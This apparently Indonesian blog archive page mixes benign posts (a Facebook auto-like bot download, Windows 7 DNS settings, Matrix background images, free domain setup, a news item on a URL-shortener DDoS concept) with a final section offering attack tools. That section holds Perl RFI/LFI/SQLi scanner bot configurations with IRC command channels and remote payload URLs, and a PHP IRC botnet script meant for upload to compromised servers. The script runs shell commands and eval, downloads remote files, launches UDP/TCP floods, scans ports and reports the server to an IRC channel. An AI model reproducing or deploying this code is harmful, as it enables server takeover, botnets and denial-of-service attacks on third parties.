THOUSANDS OF FREE BLOGGER TEMPLATES

Minggu, 09 September 2012

Download BOT Auto Like & Auto Comment v4.13 I Facebook

Siapa yang tidak mengenal BOT...? Bila kita menjelajah dunia maya pasti tidak asing lagi dengan istilah BOT. Bot adalah salah satu klien automatik yang dihubungkan ke suatu system yang secara tidak langsung dikendalikan oleh manusia. Suatu bot bereaksi terhadap perintah yang sudah dikenal dengan tindakan yang sudah dikenal. Bot tersedia dalam banyak format, mulai dari yang sederhana dan yang beroperasi melalui script di server, sampai ke botyang lengkap dan kuat. Disini saya tidak akan membahas satu-persatu jenis BOT, namun saya akan mencoba memperkenalkan salah satu jenis yakni DESKTOP BOT yang bersifat hanya untuk hiburan semata. Kenapa disebut dekstop bot, karena memang bot ini tidak dijalankan pada suatu server seperti layaknya script bot, bot ini memang berbentuk dekstop aplikasi dan dijalankan pada komputer personal, sehingga jika komputer tidak dijalankan maka bot pun tidak akan berjalan. Fungsi Bot yang saya buat ini adalah BOT Facebook yang bersifat, dimana bot ini akan melakukan beberapa tindakan yang layaknya user facebook lakukan, yaitu LIKE STATUS, COMMENT STATUS sampai dengan KONFIRMASI PERMINTAAN PERTEMANAN secara otomatis. Mungkin bagi yang sudah pernah menggunakan versi sebelum tidak begitu bingun, karena memang untuk bot yang satu ini merupakan pengembangan bot yang sebelumnya sudah saya buat, tentu saja dengan beberapa improvement-improvement. Berikut adalah detail mengenai bot terbaru tersebut. Nama Aplikasi : FB AUTO COMMENT & LKE GENERATOR+ - Versi : 4.1.3 - Rilis : 19 Juli 2011 - Facebook : http://fb.com/groups/cyber.xplorer ================================================== 1. LISENSI ================================================== - FB Auto Comment & Like Generator+ adalah software tak berbayar (freeware) - Penyalahgunaan penggunaan akan berakibat dihentikannya layanan bot ================================================== 2. PEMBAHARUAN ================================================== - Tampilan baru dan dapat dikonfigurasi - Auto Konfirmasi permintaan pertemanan - Auto Logout dari FB jika aplikasi dihentikan - Suport Systray - Target bisa dipilih - Pengecualian target (ID) - Tanda tangan bisa diedit (jika sebelumnya tanda tangan sudah fix) - Perbaikan : Komen yang diulang-ulang dalam satu kiriman yang sama sehingga menjadikan spam ================================================== 3. PENGGUNAAN ================================================== - Konek ke Facebook (Tombol Connect) - Login ke Akun melalui browser yang ada di aplikasi - Setting > Isi komentar (untuk Auto Comment) > Check [Friend Mention] untuk menyebut Nama teman dalam komentar > Untuk mengecualikan seseorang dari aksi BOT, setting pada Expection > Pilih target bot > Set Interval waktu - Start 1. Tampilan Depan 2. Tampilan Pengaturan Untuk pengaturan ini, user bisa dengan leluasa menentukan aksi bot, apa target dan komentar apa yang akan dikirim. - COMMENT : Textbox ini diisi jika kita pilih aksi bot = Auto comment - SIGNATURE ; Untuk memberikan tanda tangan di akhir komentar. - MENTION FRIEND : Untuk menyebut nama teman dalam komentar. - TOMBOL EXCEPTION: Untuk mengatur pengecualian. - TARGET : Target bot ;) - INTERVAL : Perulangan waktu yang dibutuhkan bot untuk melakukan aksinya. 3. Pengaturan Pengecualian. Klik Add / [+] dan masukkan ID facebook dari teman yang akan dikecualikan Klik Remove / [-] untuk menghilangkan pengecualian Kemudiaan klik [SAVE] untuk menyimpan. 4. Bot juga bisa diatur melalui Systray (Kondisi aplikasi disembunyikan) Note : Semua pengaturan akan disimpan dan diload secara otomatis ketika Bot dijalankan.

Sabtu, 08 September 2012

Cara Mengganti IP Address dan DNS di Windows 7 R

Berawal dari artikel yang membahas tentang bagaimana menstabilkan koneksi internet dan artikel cara mengganti DNS menggunakan Google DNS dan OpenDNS, banyak yang bertanya bagaimana cara mengganti DNS jika menggunakab Windows 7? Maka pada artikel ini kami akan menjelaskan dengan singkat bagaimana cara melakukannya. Cara Mengganti IP Address dan DNS di Windows 7 Image Jika sudah terbiasa berinteraksi dengan jaringan komputer, artikel ini tidak akan banyak bermanfaat karena trik ini sudah menjadi kegiatan harian anda. Silahkan baca artikel lain yang lebih bermanfaat. Berikut ini cara mengganti DNS server pada Windows 7 (Bisa diimplementasikan di semua jenis Windows 7): Pertama masuk ke Control Panel dengan klik Start kemudian pilih Control Panel. Lanjutkan dengan klik Network and Internet. Setelah itu, klik Network and Sharing Center. Lanjutkan dengan klik Change adapter settings. Pilih jenis koneksi yang anda gunakan. Bagi pemula, mungkin ini yang agak sulit menetukannya karena biasanya pada setiap notebook, komputer maupun netbook ada lebih dari satu koneksi yang digunakan. Jika menggunakan modem, biasanya tertulis tipe modem yang digunakan seperti EVDO, HSPA, ADSL dan lain sebagainya. Jika menggunakan WiFi, di situ akan tertulis Wireless Network Connections dan jika menggunakan kabel LAN di situ akan tertulis Local Area Connections. Klik kanan pada media koneksi yang anda lakukan kemudian pilih Properties (Pada contoh kami menggunakan koneksi WiFi). Cara Mengganti IP Address dan DNS di Windows 7 Image Di situ ada beberapa pilihan mulai dari Client for Microsoft Networks sampai dengan Link Layer Topology Discovery responder. Pilih Internet Protocol Version 4 (TCP/IPv4) dan jangan pilih yang TCP/IPv6 karena di Indonesia teknologi ini belum diimplementasikan. Klik sekali dan lanjutkan dengan klik tombol Properties di bawahnya. Cara Mengganti IP Address dan DNS di Windows 7 Image Di situ anda akan melihat beberapa setting mengenai IP Address dan DNS. Isilah sesuai dengan keinginan anda. Jika ingin menggunakan Google DNS atau OpenDNS, silahkan buka halaman yang sudah kami sebutkan di awal dan isikan pada situ. Cara Mengganti IP Address dan DNS di Windows 7 Image Terakhir, klik OK dua kali. Sekarang anda sudah berhasil mengganti DNS menggunakan OpenDNS atau Google DNS. Jika ingin mengetahui perubahan yang sudah anda lakukan, buka Command Prompt, kemudian ketikkan ipconfig /all dan hasilnya seperti di bawah ini. Selain untuk keperluan mengganti DNS dengan Google DNS atau OpenDNS, trik ini juga bisa digunakan untuk keperluan seperti penggantian IP Address yang crash dengan komputer lain, penggantian tipe IP dari Dynamic ke Static dan lain sebagainya. Jika ada yang perlu ditanyakan, silahkan tinggalkan komentar di bawah ini. Selamat mencoba dan semoga berhasil. Read more: http://blog.fastncheap.com/mengganti-ip-address-dns-windows-7/#ixzz25tLOg97Q

Kamis, 22 Maret 2012

Cara Pasang Background Matrix Di Blog

Login ke blog sobat.
Klik "Design" kemudian klik "Edit HTML".
Cara Pasang Background Matrix Di Blog

Cari kode kemudian copy-paste kode CSS di bawah ini diatas .

Ganti kode yang berwarna merah pada baris kode atas dengan URL gambar animasi matrix yang sobat inginkan.
Klik "Save" dan lihat hasilnya...

Animasi Gambar Matrix

0-1-1 Matrix
Cara Pasang Background Matrix Di Blog
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQttco4YsVQBBw7yDmFqrcMLs1kBbH36PRDI2wfIhgIgT0fu50SmbicmqnUcQoHo9McERYQ-OqdNLEnxChNS4bgHJferSC3JuM4Zj4ZI8BHmbCqW43naTbkWx0DtU4-tabkozdA-r-v4g/s1600/0_1_1.gif

Black Red Matrix
Cara Pasang Background Matrix Di Blog
https://lh6.googleusercontent.com/-oIKDL5K_Jus/Ts32BmE64MI/AAAAAAAAAgI/QncRScTidN8/s800/black_red_matrix.gif

Blue Matrix 1
Cara Pasang Background Matrix Di Blog
https://lh3.googleusercontent.com/-bf_x-yTTHjQ/Ts32HIlpUJI/AAAAAAAAAgQ/WctrlVSdVXI/s800/bluematrix.gif

Blue Matrix 2
Cara Pasang Background Matrix Di Blog
https://lh6.googleusercontent.com/-wnxb6Bv75j8/Ts32HR4rlOI/AAAAAAAAAgU/ubCAT0zE3hA/s800/bluematrix2.gif

Green Matrix
Cara Pasang Background Matrix Di Blog
https://lh4.googleusercontent.com/-yEVdif3Bi_U/Ts32PtuIGBI/AAAAAAAAAgo/Ce1ujGXZ6RE/s800/matrix.gif

Port Listener
Cara Pasang Background Matrix Di Blog
https://lh3.googleusercontent.com/-CYobas4WGXo/Ts32QusPKsI/AAAAAAAAAgw/xQQMNbgAa0M/s800/port_listener.gif

Red Matrix
Cara Pasang Background Matrix Di Blog
https://lh5.googleusercontent.com/-F5UfAsRs24I/Ts0uwOoH7QI/AAAAAAAAAf4/UQXNleByOcE/s800/monozcore_blogspot_com_redmatrix.gif

Blue Matrix
Cara Pasang Background Matrix Di Blog
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7mYPMewsYebKTcbLcLmLHgxszDciy5wPgo1pa4DuJdadIaDSNkoYRb5ZL0A5oRXU4bmEwW0fs4d1NWPK_TtfuHu2MXgGQwsyJkq2l9K6WbI-V5sbZHLodZyOMgw3LJCK2FrbJzHDVEl0/s800/matrix.gif

Sabtu, 25 Juni 2011

Pemendek URL Bisa Jadi Senjata 'Matikan' Server

Jakarta - Sebuah konsep telah dibuktikan kebenarannya. Seseorang bisa membuat layanan pemendek URL ala bit.ly yang dimanipulasi agar menjadi senjata dalam serangan cyber untuk 'mematikan' server.

Konsep itu dibuktikan oleh Ben Schmidt, seorang peneliti di University of Tulsa, Amerika Serikat. Ia membuat layanan pemendek URL d0z.me yang diklaim bisa digunakan untuk melakukan serangan Distributed Denial of Service (DDoS).

Pria dengan julukan Supernothing itu menyampaikan konsepnya di Slashdot seperti dikutip detikINET, Selasa (21/12/2010). Salah satu yang mendasari penelitiannya adalah kemampuan melakukan DDoS lewat Javascript.

"Konsepnya cukup sederhana kok. Penyerang cukup ke d0z.me, lalu memasukkan tautan ke konten yang mau mereka bagikan, tapi juga memasukkan alamat server yang mau diserang," tuturnya dalam blog spareclockcycles.org.

Kemudian, ia melanjutkan, penyerang cukup mengirimkan link pendek itu ke sebanyak mungkin orang. Hal ini, menurutnya, bisa dilakukan lewat social media seperti Twitter, Facebook atau lainnya.

Saat pengguna mengklik link tersebut, mereka akan melihat konten yang diinginkan. Namun sebenarnya, di balik itu, komputer pengguna juga digunakan untuk melakukan serangan DDoS.

Hal ini disebutkan bisa tercapai dengan memanfaatkan iFrame untuk 'membungkus' konten yang ditampilkan. Sedangkan serangannya menggunakan Javascript.

Dua Skenario

Ada dua skenario yang menurut Supernothing bisa dijalankan. Pertama, mencoba menyebarkan link ke konten yang memang menarik dan bisa menjadi sangat populer.

Diharapkan link itu mengarah ke konten yang membuat pengguna betah. Misalnya, ia menyarankan, game online.

Sedangkan skenario kedua adalah memakai d0z.me untuk menggalang relawan untuk menyerang situs tertentu. Hal ini seperti yang dilakukan kelompok Anonymous saat mendukung Wikileaks beberapa waktu lalu.

Bedanya, penggunaan pemendek URL seperti itu bisa memberi alasan bagi para relawan bila diusik oleh pihak berwajib. Mereka bisa mengatakan 'tidak tahu' bahwa link yang mereka kunjungi melakukan serangan ke server lain. ( wsh / wsh )

Sumber : Detikinet

BUAT SENDIRI WEBSITE KAMU

Tips bagi anda yang ingin punya website tapi ngga punya uang untuk membuatnya.

syaratnya adalah:
ada niat dari sang pelaku
bisa membuat web dari html ataupun php

Kalo syarat no 2 tidak terpenuhi lebih baik anda menggunakan weblog seperti
blogger/blogspot, karena blogger juga bisa menggunakan domain gratisan ini.
caranya klik disini
Hosting adalah tempat untuk menyimpan file dari website kita
Domain adalah nama untuk website kita cth: www.namaweb.com dimana .com merupakan
Top level domain(TLD)
To the point
Langkah langkahnya adalah:
Anda harus menyiapkan web yang sudah anda buat.
lalu daftar di domain gratisan dibawah ini, pilih salah satu:
CO.CC:Free Domain
Register your domain name and build your site at UNI.CC
masukkan nama domain yang anda pilih cth www.namalo.co.cc / www.namalo.uni.cc
—————-.co.cc———————————–
Jika menggunakan .co.cc, setelah
login lalu edit domain anda, lalu pilih option 1 dan pilih manage nameserver
masukkan ns dibawah ini pada form yg disediakan
dns1.000webhost.com
dns2.000webhost.com
lalu klik setup domain dan selesai
jangan lupa pasang logo domain .co.cc
pada web anda di halaman depannya saja.
kekurangan .co.cc :
– pada banner terlihat jelas kita menggunakan domain gratisan
– update NS lama, jadi domain kita harus nunggu untuk dapat diakses
Kelebihan :
– domain lebih pendek .co.cc dan
lebih enak dibaca :D
————————– .uni.cc———————————————-
jika menggunakan .uni.cc
pada Domain Setup masukkan nama situs kamu, trus pilih service DNS
Masukkan category yg cocok dengan web kamu.
klik continue
begitu masuk Domain Control Panel
pilih record type NS
masukkan nameserver dibawah ini pada form yang disediakan
dns1.000webhost.com
dns2.000webhost.com
lalu klik update DNS record dan klik continue
jangan lupa masukkan logo dari .uni.cc
di web kamu
kodenya ada dibagian bawah Domain Control Panel
kelebihan:
– banner kecil, sehingga tidak diketahui kalo kita pake domain gratisan
– update NS cepat
kekurangan:
jika dalam 3 bulan tidak ada yg mengakses melebihi 10 kali maka domain dihapus
kedua domain gratisan tidak memasang iklan di web kita tetapi hanya menyuruh
kita memasang linkback mereka di web kita
———-end of domain gratisan———————-
setelah itu daftar di webhosting gratisan untuk menyimpan file web anda saya
sarankan daftar di webhost bawah ini:

Free Web Hosting

kenapa? karena selain bagus, NS yang anda isikan diatas merupakan NS dari webhost
ini.
kelemahan: jika dalam 30 hari web anda tidak ada yg akses maka akun anda di
delete dan username anda adalah huruf dan angka
yang acak.
maka dari itu jangan sia-siakan kesempatan ini
begitu anda masuk ke 000webhost klik order now dibagian
atas.
lalu isikan form seperti dibawah ini:
jika .co.cc
jika .uni.cc
Setelah itu ikuti petunjuknya. dan verifikasi emailnya.
biasanya domain anda akan aktif 2x24jam karena semua DNS server perlu waktu
untuk update domain anda.
lalu anda coba akses domain anda www.namawebanda.uni.cc
atau www.namawebanda.co.cc Sesuai yg anda gunakan.
jika yang tampil direktori web maka domain anda sudah dapat digunakan dan sekarang
anda tinggal upload file web anda ke webhostnya.
cara uploadnya adalah dengan memasuki cpanel http://www.namawebanda.uni.cc/cpanel
atau http://www.namawebanda.co.cc/cpanel
jika domain anda belum aktif anda bisa mengaksesnya pada url dibawah ini
http://64.191.112.53:2082/
file web anda bisa dikompress ke format .zip, terus upload dan
ekstrak di server. agar anda tidak perlu satu2 file yg di upload.
Selamat mencoba!!
Pengguna blogger
bagi yang mau url blogger/blogspotnyanya menggunakan domain gratisan
langkah langkahnya seperti ini:
daftar ke .co.cc
CO.CC:Free Domain
cara daftarnya cukup masukkan nama web anda lalu klik check
lalu klik register now
ikuti petunjuknya
begitu selesai anda akan masuk ke control panel
pada my domain pilih edit
lalu pilih option pertama akan terlihat seperti dibawah ini
masukkan fully qualified domain name(FQDN) dengan domain anda
isikan yg bawahnya sesuai yg di gambar atas.
lalu klik add record.
selesai untuk domain. sekarang masuk ke akun blogspot anda di blogger
masuk ke pengaturan/setting di blogger/blogspot
lalu pilih publikasikan
pilih Berpindah ke : • Domain Kustom
lali klik Beralihlah ke pengaturan lanjut
masukkan domain anda di form yg tersedia contoh
www.namaweb.co.cc
gunakan domain yang anda daftarkan di .co.cc
setelah itu simpan pengaturan
tunggu sekitar 2×24 jam setelah itu domain dapat dipakai
kalo beruntung biasanya dalam 1 jam udah selesai dan bisa digunakan.

KUMPULAN BOT PERL [ LFI RFI SQLI DLL]

#!/usr/bin/perl
$powered=”ByroeNet”;
$mail=”admin(at)byroe.net”;
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = “/usr/sbin/apache2 -k start”;
$ircserver = “irc.malangcyber.server.or.id”;
my $ircport = “6667″;
my $nickname = “loveYou”;
my $ident = “love”;
my $channel = “#malangcyber”;
my $runner = “xr0b0t”;
my $fullname = ‘matamu hahah’;
my $lfi = “!lfi”;
my $xml = “!xml”;
my $e107 = “!e107″;
my $sql = “!sql”;
my $rfi = “!rfi”;
my $cmdlfi = “!cmdlfi”;
my $cmde107 = “!cmde107″;
my $cmdxml = “!cmdxml”;
Download disini + id

=======================selesai di sini ================
e107 Scanner ByroeNet

#!/usr/bin/perl
$powered=”ByroeNet”;
$mail=”admin(at)byroe.net”;
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = “/usr/sbin/apache2 -k start”;
$ircserver = “irc.malangcyber.server.or.id”;
my $ircport = “6667″;
my $nickname = “loveYou”;
my $ident = “love”;
my $channel = “#malangcyber”;
my $runner = “xr0b0t”;
my $fullname = ‘matamu hahah’;
my $lfi = “!lfi”;
my $xml = “!xml”;
my $e107 = “!e107″;
my $sql = “!sql”;
my $rfi = “!rfi”;
my $cmdlfi = “!cmdlfi”;
my $cmde107 = “!cmde107″;
my $cmdxml = “!cmdxml”;
Download disini + id
=============selesai di sini ================
FeeLCoMz RFI Scanner Bot v5.0
Filed in ./Bot RFI0 comments
#!/usr/bin/perl
print(‘
###############################################
## FeeLCoMz RFI Scanner Bot v5.0 ##
## By FaTaLisTiCz_Fx ##
## © Agu 2008 – Feb 2009, FeeLCoMz Community ##
## http://feelcomz.co.cc ##
## modified by cLassic RosE ##
###############################################
‘);
######################################################
## Usage: ##
## perl feelscanz.pl ##
## Notes: ##
## + All Parameters are optional ##
## ##
## Features: ##
## + RFI Scanner ##
## + RFI Scan & Exploit (Exploit per engine) ##
## + Joomla RFI Scan & Exploit ##
## + Milw0rm Search ##
## + Google bypass (Using PHP) ##
## + Message Spy & Save ##
## + Auto Spreading ##
######################################################
## History:
## + Fixed cryptz command (v4.5)
## + Fixed user commands execution by unauthorized user (v4.6) (thanks to ajegile)
## + Added options to enable/disable encrypted password (v4.7)
## + Fixed missing hostname on sublink (v4.8)
## + Added links filter to exclude exploiting bad links (v4.9)
## + Fixed private message scanning (v4.9.2) (thanks to BLood_roSE)
## + Added spread configuration (v5.0)

use strict;
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
my $versi = “v5.0″;
my $cmdpre = “^”; #commend
my $mysite = “http://www.mysandhaanu.com//includes/”; #Path to Sources URL (Optional)
##[ KONFIGURASI URL ]##
my $fx29id = “http://indiamariae.com/includes/1.txt????”; #Fx29ID1 (Simple) / #Fx29ID2 (Advanced)
my $fx29id2 = “http://indiamariae.com/includes/2.txt???”; #Fx29ID2 (Advanced)
my $fx29sh = “http://www.mysandhaanu.com//scripts/inc.pdf?????”; #Fx29Sh (Optional)
my $bypass = “http://gamernz.com/google.php”; #Google Bypasserz (Optional)
##[ KONFIGURASI SOURCE ]##
my $spread = $mysite.”red.jpg?”; #Fx29Spreadz (Optional)
my $joomlaz = $mysite.”red.jpg”; #Joomla’s Bugs List (Required for Joomla RFI Scanner)
##[ KONFIGURASI IRC ]##
my @servers = (“irc.kamtiez.server.or.id”); #IRC Servers (Separated by coma)
my %bot = (
nick => “Mbem[".int(rand(100))."]“,
ident => “Septiy”.int(rand(100)),
chan => “#xr0b0t”, #Channels to join (Separated by coma)
server => “irc.kamtiez.server.or.id”,
port => “7000″
);
donwload disini + id

PHPDDOS

Oke kali ini ada beberapa tool buat ddos..
yaitu php ddos..
script ini di upload ke shell bentuk file php
kemudian load file ddos ini dengan cara
sama seperti bukak website biasa
selamat mencoba
di bawah ini Scriptnya


/*
*
*
* COMMANDS:
*
* .user
//login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail //send an email
* .dns //dns lookup
* .download //download a file
* .exec // uses exec() //execute a command
* .sexec // uses shell_exec() //execute a command
* .cmd // uses popen() //execute a command
* .info //get system information
* .php
// uses eval() //execute php code
* .tcpflood
//tcpflood attack
* .udpflood
//udpflood attack
* .raw //raw IRC command
* .rndnick //change nickname
* .pscan
//port scan
* .safe // test safe_mode (dvl)
* .inbox // test inbox (dvl)
* .sambung
// conect back (dvl)
* .uname // return shell’s uname using a php function (dvl)
*
*/
set_time_limit(0);
error_reporting(0);
echo “ok!”;
class pBot
{
var $config = array(“server”=>”irc.indonesiancoder.us”, // ip/host da rede
“port”=>”6667″, // porta da rede
“pass”=>”asyu”, // senha da rede
“prefix”=>”urat”, // nick do bot
“maxrand”=>”2″, // quantidade de numero no nick do bot
“chan”=>”#MC-crew”, // canal que os bots vao entrar
“chan2″=>”#MC-crew”, // canal aonde os bots v?o mandar as vulns ao conectar (-n)
“key”=>”senhadocanal”, // senha do canal
“modes”=>”+p”, // modos do bot
“password”=>”asyu”, // senha pra acesso (.user SENHA)
“trigger”=>”.”, // prefico dos comandos
“hostauth”=>”*” // host dos owners (* for any hostname)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range(“0″,”9″);
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send(“PASS “.$this->config['pass']);
$this->send(“USER “.$ident.” 127.0.0.1 localhost :”.php_uname().”");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(” “,$this->buf);
if(substr($this->buf,0,6)==”PING :”)
{
$this->send(“PONG :”.substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] ==”001″)
{
$this->send(“MODE “.$this->nick.” “.$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get(“safe_mode”) or strtolower(@ini_get(“safe_mode”)) == “on”) { $safemode = “ON”; }
else { $safemode = “OFF”; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],”uname: $uname (Safe: $safemode)”);
$this->privmsg($this->config['chan2'],”Vuln : http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”");
}
if(isset($cmd[1]) && $cmd[1]==”433″)
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf,” :”),2);
$msgcmd = explode(” “,$msg);
$nick = explode(“!”,$cmd[0]);
$vhost = explode(“@”,$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<="" p="">
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<="" p="">
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case “QUIT”:
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case “PART”:
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case “PRIVMSG”:
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == “*”))
{
if(substr($mcmd[0],0,1)==”.”)
{
switch(substr($mcmd[0],1))
{
case “user”:
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],”[\2Auth\2]: Wawwwwwwwww $nick Bocah Goblok!!”);
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==”.”)
{
switch(substr($mcmd[0],1))
{
case “restart”:
$this->send(“QUIT :restart commando from $nick”);
fclose($this->conn);
$this->start();
break;
case “mail”: //mail to from subject message
if(count($mcmd)>4)
{
$header = “From: <".$mcmd[2].">“;
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],”[\2mail\2]: Impossivel mandar e-mail.”);
}
else
{
$this->privmsg($this->config['chan'],”[\2mail\2]: Mensagem enviada para \2″.$mcmd[1].”\2″);
}
}
break;
case “safe”:
if (@ini_get(“safe_mode”) or strtolower(@ini_get(“safe_mode”)) == “on”)
{
$safemode = “on”;
}
else {
$safemode = “off”;
}
$this->privmsg($this->config['chan'],”[\2safe mode\2]: “.$safemode.”");
break;
case “inbox”: //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = “From: “;
$a = php_uname();
$b = getenv(“SERVER_SOFTWARE”);
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],”InBox Test”,”#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”\n\ngreetz: wicked\nby: dvl “,$header))
{
$this->privmsg($this->config['chan'],”[\2inbox\2]: Unable to send”);
}
else
{
$this->privmsg($this->config['chan'],”[\2inbox\2]: Message sent to \2″.$mcmd[1].”\2″);
}
}
break;
case “sambung”:
if(count($mcmd)>2)
{
$this->sambung($mcmd[1],$mcmd[2]);
}
break;
case “dns”:
if(isset($mcmd[1]))
{
$ip = explode(“.”,$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyname($mcmd[1]));
}
}
break;
case “info”:
case “vunl”:
if (@ini_get(“safe_mode”) or strtolower(@ini_get(“safe_mode”)) == “on”) { $safemode = “on”; }
else { $safemode = “off”; }
$uname = php_uname();
$this->privmsg($this->config['chan'],”[\2info\2]: $uname (safe: $safemode)”);
$this->privmsg($this->config['chan'],”[\2vuln\2]: http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”");
break;
case “bot”:
$this->privmsg($this->config['chan'],”[\2bot\2]: phpbot 2.0 by; #crew@corp.”);
break;
case “uname”:
if (@ini_get(“safe_mode”) or strtolower(@ini_get(“safe_mode”)) == “on”) { $safemode = “on”; }
else { $safemode = “off”; }
$uname = php_uname();
$this->privmsg($this->config['chan'],”[\2info\2]: $uname (safe: $safemode)”);
break;
case “rndnick”:
$this->set_nick();
break;
case “raw”:
$this->send(strstr($msg,$mcmd[1]));
break;
case “eval”:
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case “sexec”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode(“\n”,$exec);
for($i=0;$i<="" p="">
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],” : “.trim($ret[$i]));
break;
case “exec”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode(“\n”,$exec);
for($i=0;$i<="" p="">
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],” : “.trim($ret[$i]));
break;
case “passthru”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode(“\n”,$exec);
for($i=0;$i<="" p="">
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],” : “.trim($ret[$i]));
break;
case “popen”:
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],”[\2popen\2]: $command”);
$pipe = popen($command,”r”);
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan'],” : $pbuf”);
}
pclose($pipe);
}
case “system”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode(“\n”,$exec);
for($i=0;$i<="" p="">
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],” : “.trim($ret[$i]));
break;
case “pscan”: // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2open\2″);
else
$this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2closed\2″);
}
break;
case “ud.server”: // .ud.server
[password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],”[\2update\2]: Server trocado para “.$mcmd[1].”:”.$mcmd[2].” Senha: “.$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],”[\2update\2]: Server trocado para “.$mcmd[1].”:”.$mcmd[2]);
}
}
break;
case “download”:
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],”w”))
{
$this->privmsg($this->config['chan'],”[\2download\2]: Proses Mendownload File. Gagal coy permissionnya dilarang.”);
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],”[\2download\2]: Proses Mendownload File \2″.$mcmd[1].”\2″);
}
else
{
for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],”[\2download\2]: Arquivo \2″.$mcmd[1].”\2 baixado para \2″.$mcmd[2].”\2″);
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],”[\2download\2]: use .download http://your.host/file /tmp/file”); }
break;
case “die”:
$this->send(“QUIT :die command from $nick”);
fclose($this->conn);
exit;
case “logout”:
$this->log_out($host);
$this->privmsg($this->config['chan'],”[\2auth\2]: $nick deslogado!”);
break;
case “udpflood”:
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case “tcpflood”:
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,”$msg\r\n”);
}
function join($chan,$key=NULL)
{
$this->send(“JOIN $chan $key”);
}
function privmsg($to,$msg)
{
$this->send(“PRIVMSG $to :$msg”);
}
function notice($to,$msg)
{
$this->send(“NOTICE $to :$msg”);
}
